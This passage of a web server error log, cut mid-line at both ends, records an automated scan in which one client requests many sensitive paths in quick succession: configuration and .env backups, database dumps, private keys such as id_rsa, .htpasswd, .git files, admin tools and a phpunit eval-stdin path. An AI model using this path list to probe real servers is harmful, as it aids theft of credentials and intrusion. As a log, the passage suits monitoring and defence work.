185.177.72.13, server: terminal.profibot.hu, request: "GET /config.local.php_old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.inc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.properties HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /appsettings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /connectionstrings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings.php.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings.php.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/config/parameters.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /composer.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /package.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug-output.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /scripts/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tmp/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /symfony/_profiler/phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /webdav/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /php-information HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tools/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /start.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /run.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /startup.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cron.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /aws-credentials.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /configure.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /service.pwd HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /service.grp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /configuration.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/etc/local.xml.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /database.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mysql.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:47 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /site.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wordpress.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server-status/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /server-info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/oauth-private.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/oauth-public.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/logs/stack.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /storage/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bootstrap/app.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/auth.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/filesystems.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/queue.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/session.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/view.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/logging.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/broadcasting.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/views/errors/500.blade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/views/errors/404.blade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /resources/views/welcome.blade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /_debugbar/open HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debugbar HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /xdebug.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /xdebug_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/symfony/debug/debug.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/composer/installed.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/autoload.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /artisan HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test_socket.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:48 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /testdb.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /errors.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /export.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /adminer-4.2.5-mysql-en.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpmyadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpmyadmin/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpmyadmin/setup/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sql.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sqladmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dbadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpminiadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mysqladmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup/database.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /database.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dump.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /data.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup.tar HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /database.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /db_backup.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /database_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.config/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.docker/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.settings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /node_modules/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /tmp/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /core/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /core/config.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config-sample.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:49 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wordpress/wp-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wordpress/wp-config-sample.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.git/HEAD HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.svn/entries HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.hg/hgrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.DS_Store HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.htpasswd HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.bash_history HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.bashrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /id_rsa HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /id_rsa.pub HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /key.pem HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /public.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ssl.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cert.pem HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /selfsigned.crt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /selfsigned.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /nginx.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /httpd.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker-compose.override.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Dockerfile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.nvmrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.yarnrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.rbenv-vars HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /settings.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /web.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /WEB-INF/web.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /META-INF/context.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/settings.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/settings.ini HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:50 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/db.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/db.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/sql.conf HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/.env.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/adminer.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/sqladmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /admin/phpmyadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/secret.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /private/secret.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secrets.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /secret.env HTTP/1.1", host: 